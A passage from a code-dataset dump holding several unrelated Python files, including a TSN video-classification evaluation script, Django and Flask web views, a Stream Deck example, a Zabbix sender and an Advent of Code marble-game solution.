topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nweights_list = args.weights.split(',')\ntest_segments_list = [int(s) for s in args.test_segments.split(',')]\nassert len(weights_list) == len(test_segments_list)\nif args.coeff is None:\n coeff_list = [1] * len(weights_list)\nelse:\n coeff_list = [float(c) for c in args.coeff.split(',')]\n\nif args.test_list is not None:\n test_file_list = args.test_list.split(',')\nelse:\n test_file_list = [None] * len(weights_list)\n\n\ndata_iter_list = []\nnet_list = []\nmodality_list = args.modalities.split(',')\narch_list = args.archs.split('.')\n\ntotal_num = None\nfor this_weights, this_test_segments, test_file, modality, this_arch in zip(weights_list, test_segments_list, test_file_list, modality_list, arch_list):\n num_class, args.train_list, val_list, root_path, prefix = dataset_config.return_dataset(args.dataset,\n modality)\n net = TSN(num_class, this_test_segments, modality,\n base_model=this_arch,\n consensus_type=args.crop_fusion_type,\n img_feature_dim=args.img_feature_dim,\n pretrain=args.pretrain\n )\n checkpoint = torch.load(this_weights)\n try:\n net.load_state_dict(checkpoint['state_dict'])\n except:\n checkpoint = checkpoint['state_dict']\n\n base_dict = {'.'.join(k.split('.')[1:]): v for k, v in list(checkpoint.items())}\n replace_dict = {'base_model.classifier.weight': 'new_fc.weight',\n 'base_model.classifier.bias': 'new_fc.bias',\n }\n for k, v in replace_dict.items():\n if k in base_dict:\n base_dict[v] = base_dict.pop(k)\n\n net.load_state_dict(base_dict)\n\n input_size = net.scale_size if args.full_res else net.input_size\n if args.test_crops == 1:\n cropping = torchvision.transforms.Compose([\n GroupScale(net.scale_size),\n GroupCenterCrop(input_size),\n ])\n elif args.test_crops == 3: \n cropping = torchvision.transforms.Compose([\n GroupFullResSample(input_size, net.scale_size, flip=False)\n ])\n elif args.test_crops == 5: # do not flip, so only 5 crops\n cropping = torchvision.transforms.Compose([\n GroupOverSample(input_size, net.scale_size, flip=False)\n ])\n elif args.test_crops == 10:\n cropping = torchvision.transforms.Compose([\n GroupOverSample(input_size, net.scale_size)\n ])\n else:\n raise ValueError(\"Only 1, 5, 10 crops are supported while we got {}\".format(args.test_crops))\n\n data_loader = torch.utils.data.DataLoader(\n TSNDataSet(args.dataset, root_path, test_file if test_file is not None else val_list, num_segments=this_test_segments,\n new_length=5 if modality == \"RGB\" else 5,\n modality=modality,\n image_tmpl=prefix,\n clip_index=args.clip_index,\n test_mode=True,\n remove_missing=len(weights_list) == 1,\n transform=torchvision.transforms.Compose([\n cropping,\n Stack(roll=(this_arch in ['BNInception', 'InceptionV3'])),\n ToTorchFormatTensor(div=(this_arch not in ['BNInception', 'InceptionV3'])),\n GroupNormalize(net.input_mean, net.input_std),\n ]), dense_sample=args.dense_sample, ),\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True,\n )\n\n if args.gpus is not None:\n devices = [args.gpus[i%len(args.gpus)] for i in range(args.workers)]\n else:\n devices = list(range(args.workers))\n\n net = torch.nn.DataParallel(net.cuda())\n net.eval()\n\n data_gen = enumerate(data_loader)\n\n if total_num is None:\n total_num = len(data_loader.dataset)\n else:\n assert total_num == len(data_loader.dataset)\n\n data_iter_list.append(data_gen)\n net_list.append(net)\n\n\noutput0 = []\noutput1 = []\noutput2 = []\n\ndef eval_video(video_data, net, this_test_segments, modality):\n net.eval()\n with torch.no_grad():\n i, data, label = video_data\n batch_size = label.numel()\n num_crop = args.test_crops\n if args.dense_sample:\n num_crop *= 10 # 10 clips for testing when using dense sample\n\n if modality == 'RGB':\n length = 3\n elif modality == 'Flow':\n length = 10\n elif modality == 'RGBDiff':\n length = 18\n else:\n raise ValueError(\"Unknown modality \"+ modality)\n\n start_time = time.time()\n data_in = data.view(-1, length*5, data.size(2), data.size(3))\n data_in = data_in.view(batch_size , num_crop, this_test_segments, length*5, data_in.size(2), data_in.size(3))\n data_in0 = data_in[:,0,:,:,:,:]\n data_in1 = data_in[:,1,:,:,:,:]\n data_in2 = data_in[:,2,:,:,:,:]\n data_in0 = data_in0.view(batch_size , 1, this_test_segments, length*5, data.size(2), data.size(3))\n data_in1 = data_in1.view(batch_size , 1, this_test_segments, length*5, data.size(2), data.size(3))\n data_in2 = data_in2.view(batch_size , 1, this_test_segments, length*5, data.size(2), data.size(3))\n rst0 = net(data_in0)\n rst0 = rst0.reshape(batch_size, 1, -1)\n rst1 = net(data_in1)\n rst1 = rst1.reshape(batch_size, 1, -1)\n rst2 = net(data_in2)\n rst2 = rst2.reshape(batch_size, 1, -1)\n \n\n if args.softmax:\n # take the softmax to normalize the output to probability\n rst0 = F.softmax(rst0, dim=1)\n rst1 = F.softmax(rst1, dim=1)\n rst2 = F.softmax(rst2, dim=1)\n\n inference_time = time.time() - start_time\n rst0 = rst0.data.cpu().numpy().copy()\n rst1 = rst1.data.cpu().numpy().copy()\n rst2 = rst2.data.cpu().numpy().copy()\n\n rst0 = rst0.reshape((batch_size, -1, num_class)).mean(axis=1).reshape((batch_size, num_class))\n rst1 = rst1.reshape((batch_size, -1, num_class)).mean(axis=1).reshape((batch_size, num_class))\n rst2 = rst2.reshape((batch_size, -1, num_class)).mean(axis=1).reshape((batch_size, num_class))\n\n return i, rst0,rst1,rst2, label, inference_time\n\n\nproc_start_time = time.time()\nmax_num = args.max_num if args.max_num > 0 else total_num\n\ntop01 = AverageMeter()\ntop05 = AverageMeter()\n\ntop11 = AverageMeter()\ntop15 = AverageMeter()\n\ntop21 = AverageMeter()\ntop25 = AverageMeter()\n\ntotal_inference_time = 0.0\n\nfor i, data_label_pairs in enumerate(zip(*data_iter_list)):\n with torch.no_grad():\n if i >= max_num:\n break\n this_rst0_list = []\n this_rst1_list = []\n this_rst2_list = []\n this_label = None\n for n_seg, (_, (data, label)), net, modality in zip(test_segments_list, data_label_pairs, net_list, modality_list):\n rst = eval_video((i, data, label), net, n_seg, modality)\n total_inference_time += rst[5]\n\n this_rst0_list.append(rst[1])\n this_rst1_list.append(rst[2])\n this_rst2_list.append(rst[3])\n this_label = label\n assert len(this_rst0_list) == len(coeff_list)\n for i_coeff in range(len(this_rst0_list)):\n this_rst0_list[i_coeff] *= coeff_list[i_coeff]\n this_rst1_list[i_coeff] *= coeff_list[i_coeff]\n this_rst2_list[i_coeff] *= coeff_list[i_coeff]\n\n ensembled_predict0 = sum(this_rst0_list) / len(this_rst0_list)\n ensembled_predict1 = sum(this_rst1_list) / len(this_rst1_list)\n ensembled_predict2 = sum(this_rst2_list) / len(this_rst2_list)\n\n for p, g in zip(ensembled_predict0, this_label.cpu().numpy()):\n output0.append([p[None, ...], g])\n for p, g in zip(ensembled_predict1, this_label.cpu().numpy()):\n output1.append([p[None, ...], g])\n for p, g in zip(ensembled_predict2, this_label.cpu().numpy()):\n output2.append([p[None, ...], g])\n cnt_time = time.time() - proc_start_time\n prec01, prec05 = accuracy(torch.from_numpy(ensembled_predict0), this_label, topk=(1, args.topk))\n prec11, prec15 = accuracy(torch.from_numpy(ensembled_predict1), this_label, topk=(1, args.topk))\n prec21, prec25 = accuracy(torch.from_numpy(ensembled_predict2), this_label, topk=(1, args.topk))\n top01.update(prec01.item(), this_label.numel())\n top05.update(prec05.item(), this_label.numel())\n top11.update(prec11.item(), this_label.numel())\n top15.update(prec15.item(), this_label.numel())\n top21.update(prec21.item(), this_label.numel())\n top25.update(prec25.item(), this_label.numel())\n if i % 1 == 0:\n print('video {} done, total {}/{}, average {:.3f} sec/video, '\n 'moving Prec@1 {:.3f} Prec@5 {:.3f}'.format(i * args.batch_size, i * args.batch_size, total_num,\n float(cnt_time) / (i+1) / args.batch_size, top11.avg, top15.avg))\n\nvideo_pred0 = [np.argmax(x[0]) for x in output0]\nvideo_pred1 = [np.argmax(x[0]) for x in output1]\nvideo_pred2 = [np.argmax(x[0]) for x in output2]\nvideo_pred0_top5 = [np.argsort(np.mean(x[0], axis=0).reshape(-1))[::-1][:5] for x in output0]\nvideo_pred1_top5 = [np.argsort(np.mean(x[0], axis=0).reshape(-1))[::-1][:5] for x in output1]\nvideo_pred2_top5 = [np.argsort(np.mean(x[0], axis=0).reshape(-1))[::-1][:5] for x in output2]\n\nvideo_labels = [x[1] for x in output0]\n\noutput_dir = args.output_dir\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n print(\"Store results matrix into {}\".format(output_dir))\noutput0_filepath = os.path.join(output_dir, str(args.clip_index)+'_'+'crop0'+'.pkl')\noutput1_filepath = os.path.join(output_dir, str(args.clip_index)+'_'+'crop1'+'.pkl')\noutput2_filepath = os.path.join(output_dir, str(args.clip_index)+'_'+'crop2'+'.pkl')\nwith open(output0_filepath, 'wb') as f:\n pickle.dump(output0, f, pickle.HIGHEST_PROTOCOL)\nwith open(output1_filepath, 'wb') as f:\n pickle.dump(output1, f, pickle.HIGHEST_PROTOCOL)\nwith open(output2_filepath, 'wb') as f:\n pickle.dump(output2, f, pickle.HIGHEST_PROTOCOL)\n\n","sub_path":"test_models_three_crops.py","file_name":"test_models_three_crops.py","file_ext":"py","file_size_in_byte":13639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"422451637","text":"from django.urls import path\nfrom students.views import FileFieldView, StudentDetailView, StudentsListView, StudentLogListView, ExaminationListView, \\\n ExaminationDetailView, AttendanceDetailView, HostelListView, HostelDetailView, HostelAttendanceDetailView, \\\n HostelStudentDetailView, VisitorDetailView, StudentVisitorDetailView, StudentPropertyDetailView, approve_attendance, \\\n approve_hostel_attendance, HostelPorterAttendanceDetailView, ExaminationSupervisorDetailView, \\\n ManagementReportListView\nfrom .views import HomePageView, upload_student_records\n\n\n\n\nurlpatterns = [\n path('', HomePageView.as_view(), name='home'),\n path('dataupload/', FileFieldView.as_view(), name='dataupload'),\n path('student/', StudentDetailView.as_view(), name='student_details'),\n path('attendance/', AttendanceDetailView.as_view(), name='attendance_details'),\n path('student/visitor', VisitorDetailView.as_view(), name='visitor_details'),\n path('student/property', StudentPropertyDetailView.as_view(), name='student_property_details'),\n path('student/studentvisitor', StudentVisitorDetailView.as_view(), name='student_visitor_attendance'),\n path('hostel/attendance/', HostelAttendanceDetailView.as_view(), name='hostel_attendance_details'),\n path('hostel/porter/attendance/', HostelPorterAttendanceDetailView.as_view(), name='hostel_porter_attendance'),\n path('examination//', ExaminationDetailView.as_view(), name='examination_details'),\n path('examination//report/', ExaminationSupervisorDetailView.as_view(), name='supervisor_report'),\n path('hostel/student//', HostelStudentDetailView.as_view(), name='hostel_student_details'),\n path('hostel//', HostelDetailView.as_view(), name='hostel_details'),\n path('students/', StudentsListView.as_view(), name='student_list'),\n path('management/report', ManagementReportListView.as_view(), name='management_report'),\n path('examinations/', ExaminationListView.as_view(), name='examination_list'),\n path('examinations/approve', approve_attendance, name='approve_attendance'),\n path('hostel/approve', approve_hostel_attendance, name='approve_hostel_attendance'),\n path('hostels/', HostelListView.as_view(), name='hostel_list'),\n path('studentslog/', StudentLogListView.as_view(), name='student_log'),\n]\n","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"262147706","text":"#!/usr/bin/env python\n\n# Python Strem Deck Library\n# Released under the MIT license\n#\n# dean [at] fourwalledcubicle [dot] com\n# www.fourwalledcubicle.com\n#\n\nfrom StreamDeck.StreamDeck import DeviceManager\n\n\ndef get_random_key_colour_image(deck):\n import random\n\n key_image_format = deck.key_image_format()\n\n key_image_byte_count = key_image_format['width'] * \\\n key_image_format['height'] * key_image_format['depth']\n\n key_image_buffer = bytearray(key_image_byte_count)\n\n rand_colour_bgr = [int(random.random() * 255) for i in range(0, 3)]\n for i in range(0, len(key_image_buffer)):\n key_image_buffer[i] = rand_colour_bgr[i % 3]\n\n return key_image_buffer\n\n\ndef key_change_callback(deck, key, state):\n print(\"Deck {} Key {} = {}\".format(deck.id(), key, state), flush=True)\n\n if state:\n deck.set_key_image(key, get_random_key_colour_image(deck))\n\n\nmanager = DeviceManager()\ndecks = manager.enumerate()\n\nprint(\"Found {} Stream Decks.\".format(len(decks)))\n\nfor d in decks:\n d.open()\n\n d.set_brightness(30)\n\n for k in range(0, d.key_count()):\n d.set_key_image(k, get_random_key_colour_image(d))\n\n current_key_states = d.key_states()\n print(\"Initial key states: {}\".format(current_key_states))\n\n d.set_key_callback(key_change_callback)\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406665715","text":"# -*- coding: utf-8 -*-\nimport json\n\nfrom flask import request, Response\n\nfrom ..utils import proccess_path\n\n\ndef post(api, path, mongo_client):\n params = request.json or request.form.to_dict()\n resource_id, collection, data = proccess_path(path=path, params=params)\n if resource_id is None:\n resource_id = mongo_client[api][collection].insert(data)\n if resource_id is not None:\n data['id'] = str(data.pop('_id'))\n return Response(\n response=json.dumps(data),\n headers={\n 'Location': '/%s/%s/%s' % (api, collection, data['id']),\n },\n status=201\n )\n else:\n return Response(\n response=json.dumps({\n 'message': u'Not supported resource creation'\n }),\n status=405\n )\n","sub_path":"auto_api/controllers/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"40121951","text":"from rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\nfrom django.contrib.auth.models import User, Group\nfrom api.models import Post, PostLike, PostDislike, ActivityProfile\nfrom api.serializers import UserSerializer, PostSerializer, PostLikeSerializer\nfrom rest_framework.views import APIView\nimport datetime\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n\n\tqueryset = User.objects.all().order_by('-date_joined')\n\tserializer_class = UserSerializer\n\n\t@action(detail=True, methods=['get'])\n\tdef activity(self, request, pk, format=None):\n\n\t\tlast_login = User.objects.get(pk=pk).last_login\n\t\tlast_activity = ActivityProfile.objects.get(\n\t\t\tperson=User.objects.get(pk=pk)).last_activity\n\t\tcontent = {\n\t\t\t'last_login': last_login, \n\t\t\t'last_activity': last_activity,\n\t\t}\n\n\t\treturn Response(content)\n\t\t\n\nclass PostViewSet(viewsets.ModelViewSet):\n\n\tqueryset = Post.objects.all()\n\tserializer_class = PostSerializer\n\n\t@action(detail=True, methods=['post', 'get'])\n\tdef like(self, request, *args, **kwargs):\n\n\t\tpost = self.get_object()\n\t\tif not any(post.likes.filter(person=request.user).all()):\n\t\t\tlike = PostLike(tweet=post, person=request.user)\n\t\t\tlike.save()\n\t\t\tif any(post.dislikes.filter(person=request.user).all()):\n\t\t\t\tpost.dislikes.filter(person=request.user).delete()\n\t\t\tcontent = {'message':'post has been liked'}\n\t\t\treturn Response(content)\n\t\telse:\n\t\t\tcontent = {'message':'post had been already liked'}\n\t\t\treturn Response(content)\n\n\t@action(detail=True, methods=['post', 'get'])\n\tdef dislike(self, request, *args, **kwargs):\n\n\t\tpost = self.get_object()\n\t\tif not any(post.dislikes.filter(person=request.user).all()):\n\t\t\tdislike = PostDislike(tweet=post, person=request.user)\n\t\t\tdislike.save()\n\t\t\tif any(post.likes.filter(person=request.user).all()):\n\t\t\t\tpost.likes.filter(person=request.user).delete()\n\t\t\tcontent = {'message':'post has been disliked'}\n\t\t\treturn Response(content)\n\t\telse:\n\t\t\tcontent = {'message':'post had been already liked'}\n\t\t\treturn Response(content)\n\n\nclass AnaliticsView(APIView):\n\t\n\tdef get(self, request, format=None):\n\t\ttry:\n\t\t\tdate_from = datetime.datetime.strptime(request.query_params['date_from'], \"%Y-%m-%d\").date()\n\t\t\tdate_to = datetime.datetime.strptime(request.query_params['date_to'], \"%Y-%m-%d\").date()\n\t\t\tif date_from > date_to: \n\t\t\t\tcontent = {'message':'from_date is older than to_date. try again.'}\n\t\texcept Exception as e:\n\t\t\tcontent = {'message':'error invalid date. try again.'}\n\t\t\treturn Response(content)\n\n\t\tlikes = request.user.person_like.filter(date__range=(date_from, date_to)).count()\n\t\tdislikes = request.user.person_dislike.filter(date__range=(date_from, date_to)).count()\n\t\tcontent = {'Analitics of like/dislke amount from your account from {} to {}'.format(\n\t\t\t\t\t\tdate_from, date_to\n\t\t\t\t\t): {'likes': likes, 'dislikes': dislikes}\n\t\t\t\t }\n\t\treturn Response(content)\t\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"622298599","text":"#!/bin/env python\n# -*-coding:utf-8-*-\n\nimport json\n\nfrom common.base_view import BaseView\nfrom common import utility\nfrom common import error_msg\nfrom conf import settings\n\nfrom profile.controllers import student_obj\nfrom profile.controllers import notification_obj\n\n\nclass Resume(BaseView):\n def get(self):\n self.set_input_argument(\"school_id\", self._user.school_id)\n self._do_get(transform_json=False)\n if self._ret != 0:\n return self.response()\n data = self._data[\"list\"]\n if not isinstance(data, list):\n if data:\n data = [data]\n else:\n data = []\n self._controller_obj.conf_match(\n input=data,\n key=(\n \"type\",\n \"flag\"\n ),\n new_key=(\n \"type_name\",\n \"flag_name\"\n )\n )\n if not self._input.get(\"student_id\", None):\n student_obj.id_match(\n session=self._db_session,\n input=data,\n match_key=\"student_id\",\n attribute_list=[\n (\"name\", \"student_name\"),\n [\"student_number\"],\n [\"academy_id\"],\n [\"major_id\"],\n [\"grade_id\"],\n [\"class_id\"],\n ])\n for i in data:\n i.img_json_path = [\n \"%s%s\" % (settings.SERVER_HOST, j)\n for j in json.loads(i.img_json)\n ]\n data = utility.to_obj(data)\n self._data[\"list\"] = data\n return self.response()\n\n def post(self):\n if not self.check_input_arguments(must_input=[\"img_json\"]):\n return self.response(error_msg.PARAMS_ERROR)\n self.set_input_argument(\"school_id\", self._user.school_id)\n self.set_input_argument(\"student_id\", self._user.id)\n self.set_input_argument(\n \"img_json\",\n json.dumps(self._input[\"img_json\"]))\n return super(Resume, self).post()\n\n def put(self):\n if not self.check_input_arguments(must_input=[\"id\", \"type\"]):\n return self.response(error_msg.PARAMS_ERROR)\n resume, number = self._controller_obj.filter_item(\n session=self._db_session,\n id=self._input[\"id\"])\n if number != 1:\n return self.response(error_msg.PARAMS_ERROR)\n resume.type = self._input[\"type\"]\n type_list = self._controller_obj.get_conf_list(\"type\")\n type_name = \"\"\n for i in type_list:\n if i[0] == int(self._input[\"type\"]):\n type_name = i[1]\n break\n notification_obj.new_item(\n session=self._db_session,\n school_id=resume.school_id,\n student_id=resume.student_id,\n title=u\"%s ,审核结果: %s\" % (resume.title, type_name),\n content=u\"%s ,审核结果: %s, 具体请到个人经历查看\" % (resume.title, type_name),\n writer=u\"管理员\",\n )\n self._db_session.commit()\n return self.response()\n","sub_path":"profile/views/resume_view.py","file_name":"resume_view.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"303228499","text":"# -*- coding: utf-8 -*-\n# pylint: disable-msg=w0201\n'''generic element models'''\n\nfrom graphalchemy.core import octopus\nfrom graphalchemy.mixins.elements import LinkMixin, NodeMixin, ElementMixin\n\n__all__ = ('Link', 'Node')\n\nconf = octopus.S\ndirect = getattr(octopus, 'direct')\ndefer = getattr(octopus, 'defer')\n\n\nclass Generic(ElementMixin, octopus.slave):\n\n '''generic graph model'''\n\n # generic links collection\n _links = direct(conf.generic.collector.link, conf.generics)\n\n @staticmethod\n def _link():\n '''link class'''\n return Link\n\n\nclass Link(LinkMixin, Generic):\n\n '''generic link model'''\n\n @staticmethod\n def _node():\n '''node class'''\n return Node\n\n @defer\n def create(self, kw):\n '''make link'''\n self.source = self.l.make(self.link, self.start, self.end, kw=kw)\n self._refresh()\n\n @defer\n def modify(self, **kw):\n '''update link'''\n self.l.modify(self, kw)\n self._refresh()\n\n\nclass Node(NodeMixin, Generic):\n\n '''generic node model'''\n\n # generic node collection\n _nodes = direct(conf.generic.collector.node, conf.generics)\n\n @defer\n def create(self, kw):\n '''make node'''\n self.source = self.n.make(kw)\n self._refresh()\n\n @defer\n def modify(self, kw):\n '''update node'''\n self.n.modify(self, kw)\n self._refresh()\n","sub_path":"graphalchemy/generics/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"285359552","text":"\"\"\"Zabbix module\"\"\"\n\nimport logging\nimport socket\nfrom zabbix.sender import ZabbixMetric, ZabbixSender\n\nclass Zabbix:\n\tdef __init__(self, server):\n\t\tself.server = server\n\n\tdef send(self, host, item, value):\n\t\tif value == None:\n\t\t\tvalue = 0\n\n\t\ttry:\n\t\t\tm = [ ZabbixMetric(socket.getfqdn(), item, value), ]\n\t\t\tz = ZabbixSender(zabbix_server=self.server).send(m)\n\t\texcept Exception as e:\n\t\t\tlogging.info(\"[Zabbix] Generic exception: %s\" % str(e))\n","sub_path":"sensor/Zabbix.py","file_name":"Zabbix.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"53925544","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport heapq\nimport sys\n\n\"\"\"\nYou talk to the Elves while you wait for your navigation system to\ninitialize. To pass the time, they introduce you to their favorite\nmarble game.\n\nThe Elves play this game by taking turns arranging the marbles in\na circle according to very particular rules. The marbles are numbered\nstarting with 0 and increasing by 1 until every marble has a number.\n\nFirst, the marble numbered 0 is placed in the circle. At this point,\nwhile it contains only a single marble, it is still a circle: the\nmarble is both clockwise from itself and counter-clockwise from\nitself. This marble is designated the current marble.\n\nThen, each Elf takes a turn placing the lowest-numbered remaining\nmarble into the circle between the marbles that are 1 and 2 marbles\nclockwise of the current marble. (When the circle is large enough,\nthis means that there is one marble between the marble that was\njust placed and the current marble.) The marble that was just placed\nthen becomes the current marble.\n\nHowever, if the marble that is about to be placed has a number which\nis a multiple of 23, something entirely different happens. First,\nthe current player keeps the marble they would have placed, adding\nit to their score. In addition, the marble 7 marbles counter-clockwise\nfrom the current marble is removed from the circle and also added\nto the current player's score. The marble located immediately\nclockwise of the marble that was removed becomes the new current\nmarble.\n\nFor example, suppose there are 9 players. After the marble with\nvalue 0 is placed in the middle, each player (shown in square\nbrackets) takes a turn. The result of each of those turns would\nproduce circles of marbles like this, where clockwise is to the\nright and the resulting current marble is in parentheses:\n\n[-] (0)\n[1] 0 (1)\n[2] 0 (2) 1 \n[3] 0 2 1 (3)\n[4] 0 (4) 2 1 3 \n[5] 0 4 2 (5) 1 3 \n[6] 0 4 2 5 1 (6) 3 \n[7] 0 4 2 5 1 6 3 (7)\n[8] 0 (8) 4 2 5 1 6 3 7 \n[9] 0 8 4 (9) 2 5 1 6 3 7 \n[1] 0 8 4 9 2(10) 5 1 6 3 7 \n[2] 0 8 4 9 2 10 5(11) 1 6 3 7 \n[3] 0 8 4 9 2 10 5 11 1(12) 6 3 7 \n[4] 0 8 4 9 2 10 5 11 1 12 6(13) 3 7 \n[5] 0 8 4 9 2 10 5 11 1 12 6 13 3(14) 7 \n[6] 0 8 4 9 2 10 5 11 1 12 6 13 3 14 7(15)\n[7] 0(16) 8 4 9 2 10 5 11 1 12 6 13 3 14 7 15 \n[8] 0 16 8(17) 4 9 2 10 5 11 1 12 6 13 3 14 7 15 \n[9] 0 16 8 17 4(18) 9 2 10 5 11 1 12 6 13 3 14 7 15 \n[1] 0 16 8 17 4 18 9(19) 2 10 5 11 1 12 6 13 3 14 7 15 \n[2] 0 16 8 17 4 18 9 19 2(20)10 5 11 1 12 6 13 3 14 7 15 \n[3] 0 16 8 17 4 18 9 19 2 20 10(21) 5 11 1 12 6 13 3 14 7 15 \n[4] 0 16 8 17 4 18 9 19 2 20 10 21 5(22)11 1 12 6 13 3 14 7 15 \n[5] 0 16 8 17 4 18(19) 2 20 10 21 5 22 11 1 12 6 13 3 14 7 15 \n[6] 0 16 8 17 4 18 19 2(24)20 10 21 5 22 11 1 12 6 13 3 14 7 15 \n[7] 0 16 8 17 4 18 19 2 24 20(25)10 21 5 22 11 1 12 6 13 3 14 7 15\n\nThe goal is to be the player with the highest score after the last marble is used up. Assuming the example above ends after the marble numbered 25, the winning score is 23+9=32 (because player 5 kept marble 23 and removed marble 9, while no other player got any points in this very short example game).\n\nHere are a few more examples:\n\n10 players; last marble is worth 1618 points: high score is 8317\n13 players; last marble is worth 7999 points: high score is 146373\n17 players; last marble is worth 1104 points: high score is 2764\n21 players; last marble is worth 6111 points: high score is 54718\n30 players; last marble is worth 5807 points: high score is 37305\n\nWhat is the winning Elf's score?\n\"\"\"\n\n\nclass Marbles(object):\n\n def __init__(this, nplayers, nrounds):\n this.nplayers = nplayers\n this.nrounds = nrounds\n this.scores = [0] * this.nplayers\n this.board = [0]\n this.cur = 0\n this.turn = -1\n this.next = 1\n\n def __str__(this):\n ret = '[%d]' % (this.turn + 1)\n for i in range(len(this.board)):\n if i == this.cur:\n ret += ' (%d)' % this.board[i]\n else:\n ret += ' %d' % this.board[i]\n return ret\n\n def Turn(this):\n this.turn = (this.turn + 1) % this.nplayers\n if this.next % 23 == 0:\n drop = this.cur - 7\n if drop < 0:\n drop += len(this.board)\n this.scores[this.turn] += this.next + this.board[drop]\n this.board = this.board[0:drop] + this.board[drop+1:]\n this.cur = drop\n else:\n ins_before = (this.cur + 2) % len(this.board)\n if ins_before == 0:\n this.board.append(this.next)\n this.cur = len(this.board) - 1\n else:\n b = this.board[0:ins_before] \n b.append(this.next)\n b.extend(this.board[ins_before:])\n this.board = b\n this.cur = ins_before\n this.next += 1\n\n def results(this):\n m = 0\n i_m = 0\n for i in range(this.nplayers):\n if this.scores[i] > m:\n i_m = i\n m = this.scores[i]\n print('%d players; last=%d points, high score is %d' % (\n this.nplayers, this.nrounds, m))\n\n\ndef part1():\n game = Marbles(9, 25)\n print(game)\n for i in range(25):\n game.Turn()\n print(game)\n game.results()\n game = Marbles(30, 5807)\n for i in range(game.nrounds):\n game.Turn()\n game.results()\n game = Marbles(419, 7105200)\n for i in range(game.nrounds):\n game.Turn()\n game.results()\n\n \n\n\nif __name__ == '__main__':\n verbose = False\n iarg = 1\n if len(sys.argv) > 1 and sys.argv[iarg] == '-v':\n verbose = True\n iarg += 1\n part1()\n","sub_path":"2018/09/day9_array.py","file_name":"day9_array.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"435043625","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 08:09:46 2020\n\n@author: Jiwoo Ahn\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport glob\nfrom pathlib import Path\nfrom tkinter import filedialog\nfrom tkinter import *\nroot = Tk()\n\n# Make it almost invisible - no decorations, 0 size, top left corner.\nroot.overrideredirect(True)\nroot.geometry('0x0+0+0')\n\n# Show window again and lift it to top so it can get focus,\n# otherwise dialogs will end up behind the terminal.\nroot.deiconify()\nroot.lift()\nroot.focus_force()\n# File dialog to pick folder directory where the results .csv files are saved\nfolderpath = filedialog.askdirectory()\nsavepath = str(Path(folderpath).parents[0]) + \"\\\\\"\n# Get rid of the top-level instance once to make it actually invisible.\nroot.destroy()\n# Read all .csv files in specified folder\nall_files = sorted(glob.glob(folderpath + '/'+'*.csv'), key=lambda x: int(os.path.basename(x).split('.')[0].split('_')[1]))\n\n# Returns the maximum result (i.e. Compression check or steel area) of all stages\ndef MaxResult(savepath, all_files, filename):\n df = pd.concat((pd.read_csv(f,header = 0) for f in all_files),axis=1,sort=False)\n col = df.columns.tolist()[0:8]\n df = df.fillna(0)\n df = df.groupby(df.columns, axis=1, sort=False).agg(np.max)\n fname = savepath + filename+\".csv\"\n df.to_csv(fname,index=False)\n return df, col\n# File name suffix\nsuffix = '_RC1-RA2'\n\n# Compares the Crushing (MPa), Ast (mm2) and Asv (mm2/m2) and gives you the highest value\nres = MaxResult(savepath, all_files, 'MaxResults'+suffix)","sub_path":"SandwichMax.py","file_name":"SandwichMax.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"389244127","text":"#\n# Copyright (c) 2014, Adam Meily\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice, this\n# list of conditions and the following disclaimer in the documentation and/or\n# other materials provided with the distribution.\n#\n# * Neither the name of the {organization} nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED 